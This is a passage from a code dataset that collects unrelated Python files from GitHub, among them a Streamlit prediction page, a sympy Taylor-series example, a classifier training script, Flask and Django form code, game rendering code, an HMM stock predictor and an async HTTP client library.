nuevos_datos.columns\n new_data = {\n \"MES\": right_column.number_input(\"MES\", min_value=1, max_value=100,key=\"mes_input\"),\n \"PRODUCTOS ALMACENADOS\": right_column.number_input(\"PRODUCTOS ALMACENADOS\", min_value=0) if \"PRODUCTOS ALMACENADOS\" in variables_no_ruido else None,\n \"GASTO DE MARKETING\": right_column.number_input(\"GASTO DE MARKETING\", min_value=0) if \"GASTO DE MARKETING\" in variables_no_ruido else None,\n \"GASTO DE ALMACENAMIENTO\": right_column.number_input(\"GASTO DE ALMACENAMIENTO\", min_value=0) if \"GASTO DE ALMACENAMIENTO\" in variables_no_ruido else None,\n \"DEMANDA DEL PRODUCTO\": right_column.number_input(\"DEMANDA DEL PRODUCTO\", min_value=1, max_value=10) if \"DEMANDA DEL PRODUCTO\" in variables_no_ruido else None,\n \"FESTIVIDAD\": right_column.number_input(\"FESTIVIDAD\", min_value=0, max_value=1) if \"FESTIVIDAD\" in variables_no_ruido else None,\n \"PRECIO DE VENTA\": right_column.number_input(\"PRECIO DE VENTA\", min_value=0) if \"PRECIO DE VENTA\" in variables_no_ruido else None\n }\n\n # Botón para realizar predicción\n if right_column.button(\"Realizar Predicción\"):\n # Filtrar las variables que no son None (aquellas que no son consideradas ruido)\n new_data_filtered = {key: value for key, value in new_data.items() if value is not None}\n new_data_df = pd.DataFrame(new_data_filtered, index=[0])\n new_predictions = bosque.predict(new_data_df)\n # Estilo del cuadro de texto\n style = \"\"\"\n padding: 10px;\n background-color: #001F3F; /* Color plateado o gris claro */\n border: 2px solid #C0C0C0; /* Borde del cuadro */\n border-radius: 5px; /* Esquinas redondeadas */\n box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); /* Sombra */\n color: #001F3F; /* Texto en azul oscuro */\n font-size: 18px; /* Tamaño de fuente más grande */\n \"\"\"\n\n # Imprimir predicción en el cuadro de texto con estilo\n st.markdown(f'
<div style=\"{style}\">Predicción de Productos Vendidos: {new_predictions[0]:.2f}</div>
', unsafe_allow_html=True)","repo_name":"EliazarNoaLlas/App-Random-Forest-Regression","sub_path":"src/app/pages/Predicciones.py","file_name":"Predicciones.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"73869315341","text":"from sympy import *\n\ninit_printing(use_unicode=True)\n# if you are using Jupyter Lab or Notebook, use the following line instead:\n#init_printing(use_latex=True)\n\nx = symbols(\"x\")\n\nf = cos(x)\n\nxi = pi/4\nxip1 = pi/3\nh = xip1 - xi\n\n# zeroth order\nf_approx = diff(f, x, 0).subs({x: xi}) # or simply call cos(xi)\n\nfor n in range(1,7): # from 1 to 6\n new_term = diff(f, x, n) * h**n / factorial(n)\n f_approx = f_approx + new_term\n pprint(f_approx)\n print(N(f_approx.subs({x: xi}))) # use N to force numerical expression\n\nf_true = N(f.subs({x: xip1}))\nprint(\"f_true = \", f_true)\nprint(type(f_true))","repo_name":"f-fathurrahman/ffr-MetodeNumerik","sub_path":"chapra_7th/ch04/chapra_example_4_2.py","file_name":"chapra_example_4_2.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"26249715257","text":"\"\"\"Train classifier\nThis is the file for training a neural domain classifier. \n\nSimply run `python train_classifier.py` with the respective parameters.\nThis will call `training_engine_classifier.py`.\n\"\"\"\n\nimport logging\nimport os\nimport sys\nimport cv2\nimport numpy as np\nimport training_engine_classifier as training\nimport pdb\nimport argparse\nimport json\n\n\n# ===========================\n# CONSTANTS\n# ===========================\nKEY_BACKGROUND_LAYER = \"rgba PNG - Layer 0 (Background)\"\nKEY_SELECTED_REGIONS = \"rgba PNG - Selected regions\"\nKEY_RESOURCE_PATH = \"resource_path\"\nKEY_LAYERS = \"layers\"\nKEY_IMAGES = \"Image\"\nKEY_VALIDATION_RATIO = \"Val\"\n\n\nkPATH_IMAGES_DEFAULT = [\"datasets/experiments/MS73/training/images\", \"datasets/experiments/b-59-850/training/images\"]\nkPATH_REGION_MASKS_DEFAULT = [\"datasets/experiments/MS73/training/regions\", \"datasets/experiments/b-59-850/training/regions\"]\nkPATH_OUTPUT_MODEL_DEFAULT = \"Models/DomClass/MS73_cap.hdf5\"\nkBATCH_SIZE_DEFAULT = 8\nkPATCH_HEIGHT_DEFAULT = 256\nkPATCH_WIDTH_DEFAULT = 256\nkMAX_NUMBER_OF_EPOCHS_DEFAULT = 50\nkNUMBER_SAMPLES_PER_CLASS_DEFAULT = 1000\nkFILE_SELECTION_MODE_DEFAULT = training.FileSelectionMode.SHUFFLE\nkSAMPLE_EXTRACTION_MODE_DEFAULT = training.SampleExtractionMode.RESIZING\nkVALIDATION_RATIO_DEFAULT = 0.2\n# ===========================\n\n\ndef menu():\n parser = argparse.ArgumentParser(description='Fast trainer')\n\n parser.add_argument(\n '-psr', \n dest='path_src', \n help='List of paths of the source folders that contain the original images.',\n action='append'\n )\n\n parser.add_argument(\n '-prg', \n dest='path_regions', \n help='Path of the folder that contains the region masks.',\n action='append'\n )\n\n parser.add_argument(\n '-out',\n dest='path_out', \n help='Paths for the models saved after the training.',\n default=kPATH_OUTPUT_MODEL_DEFAULT\n )\n\n parser.add_argument(\n '-width',\n default=kPATCH_HEIGHT_DEFAULT,\n dest='patch_width',\n type=int,\n help='Patch width'\n )\n\n parser.add_argument(\n '-height',\n default=kPATCH_WIDTH_DEFAULT,\n dest='patch_height',\n type=int,\n help='Patch height'\n )\n\n parser.add_argument(\n '-b',\n default=kBATCH_SIZE_DEFAULT,\n dest='batch_size',\n type=int,\n help='Batch size'\n 
)\n\n parser.add_argument(\n '-e',\n default=kMAX_NUMBER_OF_EPOCHS_DEFAULT,\n dest='max_epochs',\n type=int,\n help='Maximum number of epochs'\n )\n\n parser.add_argument(\n '-n',\n default=kNUMBER_SAMPLES_PER_CLASS_DEFAULT,\n dest='number_samples_per_class',\n type=int,\n help='Number of samples per class to be extracted'\n )\n\n parser.add_argument(\n '-fm',\n default=kFILE_SELECTION_MODE_DEFAULT, \n dest='file_selection_mode',\n type=training.FileSelectionMode.from_string, \n choices=list(training.FileSelectionMode), \n help='Mode of selecting images in the training process'\n )\n\n parser.add_argument(\n '-sm',\n default=kSAMPLE_EXTRACTION_MODE_DEFAULT, \n dest='sample_extraction_mode',\n type=training.SampleExtractionMode.from_string, \n choices=list(training.SampleExtractionMode), \n help='Mode of extracing samples for each image in the training process'\n )\n\n parser.add_argument(\n '-val',\n default=kVALIDATION_RATIO_DEFAULT,\n dest='validation_ratio',\n type=float,\n help='Ratio of validation images used for training the models'\n )\n\n args = parser.parse_args()\n\n args.path_src = args.path_src if args.path_src is not None else kPATH_IMAGES_DEFAULT\n args.path_regions = args.path_regions if args.path_regions is not None else kPATH_REGION_MASKS_DEFAULT\n \n print('CONFIG:\\n -', str(args).replace('Namespace(','').replace(')','').replace(', ', '\\n - '))\n\n return args\n\n# Return the list of files in folder\n# ext param is optional. For example: 'jpg' or 'jpg|jpeg|bmp|png'\ndef list_files(directory, ext=None):\n list_files = [os.path.join(directory, f) for f in os.listdir(directory)\n if os.path.isfile(os.path.join(directory, f)) and ( ext==None or re.match('([\\w_-]+\\.(?:' + ext + '))', f) )]\n\n return sorted(list_files)\n\n# Return the list of files for each folder in a list of directories.\n# ext param is optional. 
For example: 'jpg' or 'jpg|jpeg|bmp|png'\ndef list_files_per_path(list_folders, ext=None):\n \n files = [list_files(path_folder, ext=ext) for path_folder in list_folders]\n return files\n\n#Initialize the dictionary with the inputs\ndef init_input_dictionary(config):\n inputs = {}\n\n inputs[\"Image\"] = []\n inputs[KEY_BACKGROUND_LAYER] = []\n inputs[KEY_SELECTED_REGIONS] = []\n inputs[KEY_LAYERS] = []\n inputs[KEY_VALIDATION_RATIO] = config.validation_ratio\n list_src_files = list_files_per_path(config.path_src)\n\n\n for idx_folder in range(len(list_src_files)):\n\n path_imgs = list_src_files[idx_folder]\n parent_path_regions = config.path_regions[idx_folder]\n\n print (path_imgs)\n dict_img = {}\n dict_img[KEY_RESOURCE_PATH] = path_imgs\n inputs[KEY_IMAGES].append(dict_img)\n\n path_regions = [ os.path.join(parent_path_regions, os.path.splitext(os.path.basename(path_imgs_i))[0] + \".png\") for path_imgs_i in path_imgs]\n dict_img = {}\n dict_img[KEY_RESOURCE_PATH] = path_regions\n inputs[KEY_SELECTED_REGIONS].append(dict_img)\n \n return inputs\n\n#########################################################################\n\nconfig = menu()\n\n# Fail if arbitrary layers are not equal before training occurs.\n\ninputs = init_input_dictionary(config)\noutputs = config.path_out\n\nprint(json.dumps(inputs, indent=2))\nprint(json.dumps(outputs, indent=2))\n\nnum_domains = len(inputs[KEY_IMAGES])\n\n# Call in training function\nstatus = training.train_domain_classifier(\n inputs=inputs,\n num_domains=num_domains,\n height=config.patch_height,\n width=config.patch_width,\n output_path=outputs,\n file_selection_mode=config.file_selection_mode,\n sample_extraction_mode=config.sample_extraction_mode,\n epochs=config.max_epochs,\n number_samples_per_class=config.number_samples_per_class,\n batch_size=config.batch_size,\n)\n\nprint(\"Finishing the Fast CM trainer job.\")\n\n","repo_name":"DDMAL/automatic_model_selection","sub_path":"train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":7253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32389575616","text":"from flask import Flask, render_template, redirect, request, url_for\r\nfrom forms import SignUpForm\r\napp = Flask(__name__)\r\n\r\napp.config['SECRET_KEY'] = '54bed9a3aef0167858e71664dd1ba697'\r\n\r\n@app.route('/')\r\ndef home():\r\n return signup()\r\n# return 'Hello Underworld'\r\n#def home(): \r\n\r\n@app.route('/signup', methods=['GET', 'POST'])\r\ndef signup():\r\n form = SignUpForm()\r\n if form.is_submitted():\r\n result = request.form\r\n return render_template('user.html', result = result)\r\n\r\n return render_template('signup.html', form=form)\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True)","repo_name":"das52038g/User_Auth","sub_path":"frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43308401218","text":"from django.contrib.auth.models import User\r\nfrom django import forms\r\nfrom models import UserProfile, Team\r\nfrom models import get_yearlist, get_createweek_year_week, get_teamlist, get_default_pick_deadline\r\nfrom django.utils import timezone\r\n\r\nimport pytz\r\n\r\nclass UserForm(forms.ModelForm):\r\n password = forms.CharField(widget=forms.PasswordInput())\r\n\r\n class Meta:\r\n model = User\r\n fields = ('username', 'email', 'first_name', 'last_name', 
'password')\r\n\r\ndef team_choices():\r\n teamlist = [(team.team_name, team.team_name) for team in Team.objects.all().order_by('team_name')]\r\n return tuple([('--------', '--------')] + teamlist)\r\n\r\nclass UserProfileForm(forms.ModelForm):\r\n def __init__(self, *args, **kwargs):\r\n super(UserProfileForm, self).__init__(*args, **kwargs)\r\n self.fields['favorite_team'] = forms.ChoiceField(choices=team_choices())\r\n\r\n class Meta:\r\n model = UserProfile\r\n fields = ('company', 'preferredtz', 'favorite_team')\r\n\r\n def clean_favorite_team(self):\r\n team_name = self.cleaned_data['favorite_team']\r\n if team_name != '--------':\r\n valid_team_names = [team.team_name for team in Team.objects.all()]\r\n if team_name not in valid_team_names:\r\n raise forms.ValidationError(\"Your team is not in the database\")\r\n else:\r\n team_name = ''\r\n return team_name\r\n\r\ndef year_choices():\r\n yearlist = get_yearlist()\r\n thisyear = timezone.now().year\r\n if thisyear not in yearlist:\r\n yearlist.append(thisyear)\r\n return tuple((i, i) for i in yearlist)\r\n\r\nweek_choices = tuple((i, i) for i in range(1, 14))\r\nclass CreateWeekForm(forms.Form):\r\n def __init__(self, *args, **kwargs):\r\n super(CreateWeekForm, self).__init__(*args, **kwargs)\r\n (defaultyear, defaultweek) = get_createweek_year_week()\r\n self.initial['year'] = defaultyear\r\n self.initial['week'] = defaultweek\r\n self.fields['year'] = forms.ChoiceField(choices=year_choices())\r\n self.fields['week'] = forms.ChoiceField(choices=week_choices)\r\n\r\n\r\n\r\nclass EditWeekForm(forms.Form):\r\n def __init__(self, *args, **kwargs):\r\n weekfields = {}\r\n if 'weekfields' in kwargs:\r\n weekfields = kwargs.pop('weekfields')\r\n gamefields = {}\r\n if 'gamefields' in kwargs:\r\n gamefields = kwargs.pop('gamefields')\r\n super(EditWeekForm, self).__init__(*args, **kwargs)\r\n self.initial['pick_deadline'] = get_default_pick_deadline()\r\n self.initial['lock_picks'] = weekfields.get('lock_picks')\r\n self.fields['lock_picks'] = forms.ChoiceField(widget=forms.RadioSelect, choices=((True, 'Yes'), (False, 'No')))\r\n self.fields['pick_deadline'] = forms.DateTimeField(widget=forms.DateTimeInput)\r\n for i in range(1, 11):\r\n gamestr = 'game%d_' % i\r\n\r\n self.initial[gamestr + 'team1'] = gamefields.get(gamestr + 'team1')\r\n self.initial[gamestr + 'team2'] = gamefields.get(gamestr + 'team2')\r\n if gamefields.get(gamestr + 'favored') is not None:\r\n self.initial[gamestr + 'favored'] = 'Team%d' % gamefields[gamestr + 'favored']\r\n self.initial[gamestr + 'spread'] = gamefields.get(gamestr + 'spread')\r\n self.initial[gamestr + 'kickoff'] = gamefields.get(gamestr + 'kickoff')\r\n\r\n self.fields[gamestr + 'team1'] = forms.ChoiceField(choices=tuple((t, t) for t in get_teamlist()))\r\n self.fields[gamestr + 'team2'] = forms.ChoiceField(choices=tuple((t, t) for t in get_teamlist()))\r\n self.fields[gamestr + 'favored'] = forms.ChoiceField(widget=forms.RadioSelect, choices=tuple(('Team%d' % i, 'Team%d' % i) for i in range(1, 3)))\r\n self.fields[gamestr + 'spread'] = forms.DecimalField(decimal_places=1)\r\n self.fields[gamestr + 'kickoff'] = forms.DateTimeField(widget=forms.DateTimeInput, required=False)\r\n\r\n def clean(self):\r\n cleaned_data = super(EditWeekForm, self).clean()\r\n\r\n # This validates that all teams are unique\r\n teamset = set()\r\n duplicateteamset = set()\r\n numuniqueteams = 0\r\n for i in range(1, 11):\r\n gamestr = 'game%d_' % i\r\n teamset.add(cleaned_data[gamestr + 'team1'])\r\n if len(teamset) == 
numuniqueteams:\r\n duplicateteamset.add(cleaned_data[gamestr + 'team1'])\r\n numuniqueteams = len(teamset)\r\n teamset.add(cleaned_data[gamestr + 'team2'])\r\n if len(teamset) == numuniqueteams:\r\n duplicateteamset.add(cleaned_data[gamestr + 'team2'])\r\n numuniqueteams = len(teamset)\r\n\r\n\r\n # This validates spread\r\n for i in range(1, 11):\r\n gamestr = 'game%d_' % i\r\n spread = cleaned_data.get(gamestr + 'spread')\r\n if spread is not None:\r\n x = int(spread * 2)\r\n if x % 2 == 0:\r\n msg = 'Game %d spread must be offset by 1/2 point (ie. 0.5, 1.5, etc.)' % i\r\n self.add_error(gamestr + 'spread', msg)\r\n\r\n if duplicateteamset:\r\n raise forms.ValidationError(\r\n 'Duplicate teams found: %s.' % ','.join(duplicateteamset)\r\n )\r\n\r\n","repo_name":"Cloudxtreme/collegefootballpick10","sub_path":"pick10/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"28890434459","text":"from Beagle import API as BGL\nfrom Newfoundland.Object import Object\nfrom random import uniform\nfrom math import sin,cos\nfrom .TitleCard import TitleCard\nfrom ..CloudBackground import CloudBackground\n\nFADEOUT_START = 500 \nclass FakeCamera():\n def __init__(self):\n self.p = [-100.0,0.0]\n\nclass CinematicPlane(Object):\n primitive = BGL.primitive.unit_uv_square\n view = BGL.view.widescreen_16_9\n shader = BGL.assets.get(\"beagle-2d/shader/beagle-2d\")\n\n def __init__(self,ticker = lambda : None, texture = None, blendmode = None ):\n self.x = 0.0\n self.y = 0.0\n self.vx = 0.01\n self.filter_color = [ 0.0,0.0,0.0,0.0 ]\n self.base_filter = 1.0\n\n self.sx = 5.0\n self.sy = 5.0\n\n self.warping = False\n self.ticker = ticker\n self.texture = texture\n self.blendmode = blendmode\n\n def get_shader_params(self):\n return {\n \"texBuffer\" : self.texture,\n \"translation_local\" : [ 0, 0 ],\n \"scale_local\" : [ self.sx, self.sy ],\n \"translation_world\" : [ self.x, self.y ],\n \"scale_world\" : [ 0.8,0.8 ],\n \"view\" : CinematicPlane.view,\n \"rotation_local\" : 0.0,\n \"filter_color\" : self.filter_color,\n \"uv_translate\" : [ 0,0 ] }\n\n def tick(self):\n self.ticker(self)\n pass\n\n def render(self):\n CinematicPlane.primitive.render_shaded( CinematicPlane.shader, self.get_shader_params() )\n\nclass BeardCinematic():\n\n def __init__(self):\n\n self.white_texture = BGL.framebuffer.from_dims(1,1)\n with BGL.context.render_target(self.white_texture):\n BGL.context.clear(1.0,1.0,1.0,1.0)\n \n self.frame = 0.0\n owner = self\n def get_plane_ticker(id):\n def default_ticker(plane):\n plane._t += 0.07\n fadein = float( 0.15 / float((id)+1) )\n if(owner.frame<1600) and (owner.frame>0): \n for i in range (0,4): \n val = min(1.0,plane.filter_color[i] + (fadein/float(i+1)))\n plane.filter_color[i] = val\n if(owner.frame>FADEOUT_START): \n for i in range (0,4): \n val = max(0.0,plane.filter_color[i] - (fadein/float(i+1)))\n plane.filter_color[i] = val\n\n spd = 0.7\n if id == 0:\n plane.y -= (0.01)*spd\n if id == 1:\n plane.y -= (0.013)*spd\n if id == 2:\n plane.y -= (0.014)*spd\n if id == 3:\n plane.y -= (0.016)*spd\n if id == 4:\n plane.y -= (0.0135)*spd\n if id == 5:\n plane.y -= (0.019)*spd\n if id == 6:\n plane.y -= (0.022)*spd\n\n\n return default_ticker\n\n def plane_initializer(id):\n def set_defaults(plane):\n plane._t = uniform(0.0,6.3)\n\n plane.sx = 2.4\n plane.sy = 18.0\n plane.x += 5.0\n\n plane.y += 12.0\n if id == 6:\n plane.y += 6.0\n if id == 4:\n plane.y -= 6.0\n\n 
def default_initializer(plane):\n set_defaults(plane)\n return plane\n return default_initializer\n\n ################\n\n planes = [\n (BGL.assets.get('KT-forest/texture/GB-00_bg'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-01_light1'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-02_light2'), BGL.blendmode.add ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard0shadow'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard1'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard2'), BGL.blendmode.alpha_over ),\n (BGL.assets.get('KT-forest/texture/GB-03_beard3'), BGL.blendmode.alpha_over )\n ]\n\n self.cinematic_planes = []\n for id, plane in enumerate(planes):\n self.cinematic_planes.append(\n plane_initializer(id)(CinematicPlane( texture = plane[0], blendmode = plane[1], ticker = get_plane_ticker(id) ))\n )\n\n self.camera = FakeCamera()\n self.title_card = TitleCard();\n self.title_card.reset(\"The GREYBEARDS protect DEEP SOVEREIGN\", False)\n self.title_card.centerx = 16\n self.title_card.top = 32\n\n def tick(self):\n self.title_card.tick()\n for plane in self.cinematic_planes: plane.tick()\n self.frame = self.frame + 1.0\n\n if( self.frame == 350):\n self.title_card.top = 64\n self.title_card.reset(\"They created the LORD series\",False)\n if( self.frame == 810):\n self.title_card.top = 160\n self.title_card.reset(\"A new type of anti-virus...\",False)\n if( self.frame == 1050):\n self.title_card.top = 192\n self.title_card.reset(\"innoculated with HUMANITY\",False)\n\n ## The Infection is Spreading \n\n #self.camera.p[0] -= 0.01\n\n if self.frame < 2850:\n return True\n return False\n\n def render(self):\n BGL.context.clear( 0.0,0.0,0.0,1.0);\n for plane in self.cinematic_planes:\n with plane.blendmode:\n plane.render()\n with BGL.blendmode.alpha_over:\n self.title_card.render()\n\n\n","repo_name":"dzz/kthuune","sub_path":"src/Cinematics/BeardCinematic.py","file_name":"BeardCinematic.py","file_ext":"py","file_size_in_byte":5693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43137317282","text":"import numpy as np\nimport pandas as pd\nfrom hmmlearn import hmm\nfrom utils import *\nimport matplotlib.pyplot as plt\nimport pickle\n\n# configuration\nblock_size = 30\nnum_states = 3\ntransmat_init = np.array([[1/num_states]*num_states]*num_states)\nstartprob_init = np.array([1, 0, 0])\n\nprint('Transition matrix: ')\nprint(transmat_init)\nprint('start prob: ')\nprint(startprob_init)\n\n\n#set numpy options\n#prevent truncated output\nnp.set_printoptions(threshold=np.inf)\nnp.set_printoptions(formatter={'float': '{:g}'.format})\n\n#import data from csv\ncolnames=['date', 'open', 'high', 'low', 'close', 'Adj Close', 'Volume']\nX = pd.read_csv('NSEI.csv', names=colnames, header=None)\nX = X.iloc[1:, 4].dropna()\n#X = X.drop(X.columns[[0]], axis=1)\nX = X.values.reshape(-1,1)\nprint(' ')\nprint(X.shape)\n\nX_train, X_test = X[:1346,0].reshape(-1,1), X[1347:,0].reshape(-1,1)\n#print(X_train)\n\nprint('Past dataset length:')\nprint(len(X_train))\nprint('Current dataset length: ')\nprint(len(X_test))\n\n# construct a sequence of past dataset\nseq_l = []\nseq = None\nlengths = []\n# iterate through dataframe\nfor i in range(0, len(X_train)-block_size + 1):\n\tprint(' Sequence construct iteration {}'.format(i+1))\n\tdf = X_train[i:i+block_size,0].reshape(-1, 1).astype('float64')\t\n\tseq_l.append(df)\n#\tprint(df)\n\tif (seq is 
None):\t\n\t\tseq = df\n\t\tlengths.append(len(df))\n\telse:\n\t\tseq = np.concatenate([seq, df])\n\t\tlengths.append(len(df))\n\nobs = {'y_pred': [], 'y': [], 'x': []}\t\t\n# iterate through the test dataset to predict\nfor i in range(0, len(X_test)-block_size):\n\tprint(' Predict iteration {}'.format(i+1))\n\tdf = X_test[i:i+block_size,0].reshape(-1, 1).astype('float64')\n\t\n\tcurr_index = df[-1,0]\n\tnext_index = float(X_test[i+block_size,0])\n\t# init \n\t#print(X_init)\n\tmean = np.mean(df)\n\n\tNm = np.random.normal(size=(1,num_states))\n\tmeans_pre = (Nm + mean)\n\n\tmeans_init = []\n\tfor j in range(num_states):\n\t\tmeans_init.append([means_pre[0][j]])\n\t\t\n\tmeans_init = np.array(means_init)\t\n\t\t\n\tstd_init = np.tile(np.identity(1), (3,1,1))*np.std(df)\n\n\tprint('Means: ')\n\tprint(means_init)\n\tprint('Covars: ')\n\tprint(std_init)\n\t\n\t# init the model\n\tmodel = hmm.GaussianHMM(n_components=num_states, covariance_type=\"full\", n_iter=100, init_params='')\n\n\t# init the model\n\tmodel.startprob_ = startprob_init\n\tmodel.transmat_ = transmat_init\n\tmodel.means_ = means_init\n\tmodel.covars_ = std_init\n\t\n\t# train the model\n\tmodel = model.fit(df)\n\t\n\t# calulate curr probability\n\tcurr_prob = model.score(df)\n\t\n\tmin = np.inf\n\tmin_val = None\n\tmin_seq = None\n\tnext_min_seq = None\n\t# traverse the sequences \n\tfor k, s in reversed(list(enumerate(seq_l))):\n\t\tpast_prob = model.score(s)\n#\t\tprint('Current: {} Past: {}'.format(curr_prob, past_prob))\n\t\t\n\t\tdiff = abs(curr_prob - past_prob)\n\t\tif (k+1 == len(seq_l)):\n\t\t\tcontinue\n\t\t\t\n\t\tif (diff < min):\n\t\t\tmin = diff\n\t\t\tmin_val = past_prob\n\t\t\tmin_seq = s\n\t\t\tnext_min_seq = seq_l[k+1]\t\n#\t\tif (np.isclose(curr_prob, past_prob, atol=10)):\n#\t\t\tfound = True\n#\t\t\tprint('Found!!')\n#\t\t\tbreak\n\t\n#\tif (found is False):\n#\t\tprint('Sorry not found...')\n#\t\tbreak\n\tlast_o = min_seq[-1,0]\n\tlast_o_n = next_min_seq[0,0]\n\to_diff = last_o_n - last_o\n\tpred_index = curr_index + o_diff\n\tprint('Diff: {}'.format(o_diff)) \n\tprint('i: {} Real: {} Prediction {}'.format(i+1, next_index, pred_index))\n\tobs['y_pred'].append(pred_index)\n\tobs['y'].append(next_index)\n\tobs['x'].append(i+1)\n\n# save the observations\nnp.save('obs.npy', obs)\n\nplt.plot(obs['x'], obs['y_pred'])\nplt.plot(obs['x'], obs['y'])\nplt.xlabel('Day')\nplt.ylabel('Index')\nfig = plt.gcf()\n#plt.show()\t\n\nloc = 'obs.png'\nfig.savefig(loc, dpi=1000, bbox_inches='tight')\n\nloc = 'obs.eps'\nfig.savefig(loc, format='eps', dpi=1000, bbox_inches='tight')\n\t\t\t\t\t\n# Clear the plot\nplt.clf()\nplt.cla()\nplt.close()\t\n\t\t\t\n\t\n","repo_name":"sbhTWR/StochasticAssignment","sub_path":"pred_seq.py","file_name":"pred_seq.py","file_ext":"py","file_size_in_byte":3725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27621087866","text":"# 2016. 1. 10 by Hans Roh hansroh@gmail.com\n\n__version__ = \"0.29.3.18\"\n\nversion_info = tuple (map (lambda x: not x.isdigit () and x or int (x), __version__.split (\".\")))\n\nimport os, sys\nfrom rs4 import asyncore\nimport timeit\nimport time, math, random\nfrom . import lifetime, queue, request_builder, response_builder, stubproxy\nfrom rs4 import logger as logger_f, tc\nfrom .client import socketpool\nfrom .dbapi import dbpool\nfrom .client import adns, asynconnect\nfrom .athreads.fifo import await_fifo\nfrom . 
import client, dbapi\nfrom aquests.protocols import dns\nfrom .protocols.http import localstorage as ls\nfrom .protocols.http import request_handler, response as http_response\nfrom .protocols import http2\nfrom .protocols.http2 import H2_PROTOCOLS\nfrom .dbapi import request as dbo_request\nimport copy\n\nDEBUG = 0\n\ntry:\n\tfrom urllib.parse import urlparse\nexcept ImportError:\n\tfrom urlparse import urlparse\n\ndef cb_gateway_demo (response):\n\tglobal _logger\n\n\ttry: cl = len (response.content)\n\texcept: cl = 0\n\tif isinstance (response, dbo_request.Request):\n\t\tstatus = \"DBO %s %s %d records/documents received\"\t% (\n\t\t\tresponse.code,\n\t\t\tresponse.msg,\n\t\t\tcl\n\t\t)\n\telse:\n\t\tstatus = \"HTTP/%s %s %s %d bytes received\" % (\n\t\t\tresponse.version,\n\t\t\tresponse.code,\n\t\t\tresponse.msg,\n\t\t\tcl\n\t\t)\n\n\t_logger.log (\n\t\t\"REQ %s-%d. %s\" % (\n\t\tresponse.meta ['req_method'],\n\t\tresponse.meta ['req_id'],\n\t\tstatus\n\t\t)\n\t)\n\t#print (response.headers)\n\t#print (response.data)\n\n\n_request_total = 0\n_finished_total = 0\n_initialized = False\n_logger = None\n_cb_gateway = cb_gateway_demo\n_concurrent = 1\n_workers = 1\n_currents = {}\n_que = None\n_dns_query_req = {}\n_timeout = 10\n_max_conns = 0\n_bytesrecv = 0\n_allow_redirects = True\n_force_h1 = False\nresult = None\n_http_status = {}\n_http_version = {}\n\ndef configure (\n\tworkers = 1,\n\tlogger = None,\n\tcallback = None,\n\ttimeout = 10,\n\tcookie = False,\n\tforce_http1 = False,\n\thttp2_constreams = 1,\n\tallow_redirects = True,\n\tqrandom = False,\n\tuse_pool = True,\n\ttracking = False,\n\tbackend = False,\n\tdns = []\n):\n\tglobal _logger, _cb_gateway, _concurrent, _initialized, _timeout\n\tglobal _workers, _que, _allow_redirects, _force_h1\n\n\tif logger is None:\n\t\tlogger = logger_f.screen_logger ()\n\t_logger = logger\n\n\tif qrandom:\n\t\t_que = queue.RandomQueue ()\n\telse:\n\t\t_que = queue.Queue ()\n\n\t_allow_redirects = allow_redirects\n\t_force_h1 = request_handler.RequestHandler.FORCE_HTTP_11 = force_http1\n\n\tif not use_pool:\n\t\tasynconnect.AsynConnect.keep_connect = use_pool\n\t\tasynconnect.AsynSSLConnect.keep_connect = use_pool\n\tif not _force_h1:\n\t\tasynconnect.AsynConnect.fifo_class = await_fifo\n\t\tasynconnect.AsynSSLConnect.fifo_class = await_fifo\n\n\thttp2.MAX_HTTP2_CONCURRENT_STREAMS = http2_constreams\n\t_workers = workers\n\t_concurrent = workers\n\n\tif not force_http1:\n\t\t_concurrent = workers * http2_constreams\n\telif http2_constreams:\n\t\tpass\n\t\t#_logger (\"parameter http2_constreams is ignored\", \"warn\")\n\n\tif callback:\n\t\t_cb_gateway = callback\n\n\tif cookie:\n\t\tls.create (_logger)\n\t_timeout = timeout\n\tclient.set_timeout (timeout)\n\tdbapi.set_timeout (timeout)\n\n\tsocketpool.create (_logger, backend = backend, use_pool = use_pool)\n\tdbpool.create (_logger, backend = backend)\n\tadns.init (_logger, dns)\n\tlifetime.init (_timeout / 2., logger) # maintern interval\n\tif tracking:\n\t\tlifetime.enable_memory_track ()\n\t_initialized = True\n\ndef _reque_first (request):\n\tglobal _que\n\n\t_que.first (request)\n\ndef handle_status_401 (response):\n\tglobal _que\n\tif not response.request.get_auth () or response.request.reauth_count:\n\t\treturn response\n\n\t_logger (\"authorization failed, %s\" % response.url, \"info\")\n\trequest = response.request\n\trequest.reauth_count = 1\n\t_reque_first (request)\n\ndef handle_status_3xx (response):\n\tglobal _allow_redirects\t, _que\n\n\tif not _allow_redirects:\n\t\treturn 
